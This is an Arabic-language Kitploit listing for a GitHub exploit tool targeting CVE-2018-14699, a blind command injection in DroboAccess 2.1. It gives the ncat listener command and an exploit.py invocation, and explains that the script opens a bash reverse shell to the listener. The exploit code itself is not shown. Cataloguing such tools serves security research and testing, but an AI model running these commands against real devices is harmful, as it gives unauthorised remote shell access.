Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2018-14699 — حقن أوامر أعمى غير مصادق عليه في دالة enable_user في DroboAccess v 2.1 | Kitploit
أدوات/GitHubGitHub/revocain/cve-2018-14699
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرة
GitHubrevocain/cve-2018-14699

CVE-2018-14699

حقن أوامر أعمى غير مصادق عليه في دالة enable_user في DroboAccess v 2.1

عرض المستودع
1منذ 3 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2018-14699

حقن أوامر بدون مصادقة في وظيفة enable_user من DroboAccess الإصدار 2.1


الاستخدام:

  • لاستخدام الأداة، قم أولاً بتشغيل مستمع (ncat -nvlp 1337)

  • ثم قم بتشغيل الاستغلال

    • مثال: exploit.py -t 192.168.1.122:8080 -l 192.168.1.2 -p 1337

    '-t', '--target', help='المضيف المستهدف للاستغلال، مثال: 192.168.1.122:8080',required=True

    '-l', '--listener-ip', help='عنوان IP للمستمع', required=True

    '-p', '--port', help='رقم منفذ المستمع', required=True

الوصف:

CVE-2018-14699 هي ثغرة حقن أوامر أعمى في DroboAccess الإصدار 2.1. المشكلة تكمن في أن وظيفة enable_user تأخذ معلمات اسم المستخدم كمدخلات مستخدم ثم تستدعي تبعية تقوم بتنفيذ شيل مباشرة دون أي تنقية. أوضح هذا حيث لا يبدو أن هناك مرجعًا آخر لهذا في أي مكان. لذا مرة أخرى، هذه ليست ثغرة في Drobo 5N2 بل ثغرة في DroboAccess. تم اختبار هذا على جهاز B810n بنجاح.

التفاصيل

سيبذل السكريبت محاولة لكتابة سكريبت إلى ملف يسمى revshell في دليل العمل الحالي. إذا نجح ذلك، فسيحاول استدعاءه باستخدام bash كملف تنفيذي، مما يؤدي إلى إنشاء اتصال عائد إلى المستمع الخاص بك مع bash!

المصادر:

  • https://blog.securityevaluators.com/call-me-a-doctor-new-vulnerabilities-in-drobo5n2-4f1d885df7fc
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14699
تنزيل الأداة